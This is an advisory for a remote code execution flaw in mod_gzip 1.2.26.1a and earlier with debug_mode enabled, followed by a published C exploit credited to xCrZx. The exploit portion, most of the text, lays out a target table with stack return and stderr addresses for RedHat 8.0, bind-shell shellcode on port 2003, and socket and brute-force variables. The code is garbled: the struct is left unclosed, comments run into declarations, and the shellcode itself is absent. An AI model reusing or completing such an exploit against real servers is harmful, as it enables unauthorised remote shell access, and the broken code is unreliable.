As reported in our previous advisory, "Multiple Vulnerabilities in mod_gzip Debugging Routines", a vulnerability in mod_gzip allows remote attackers to execute arbitrary code when the debug_mode option is enabled.
Credit:
The information has been provided by xCrZx.
Vulnerable systems:
* mod_gzip version 1.2.26.1a and prior with debug_mode enabled
Exploit:
/*
\ [exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
\ Created by xCrZx crazy_einstein yahoo com /05.06.03/
/
\ Tested on RedHat 8.0 (Psyche) (here is target for it),
/ also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/
\
*/
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // distribution info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");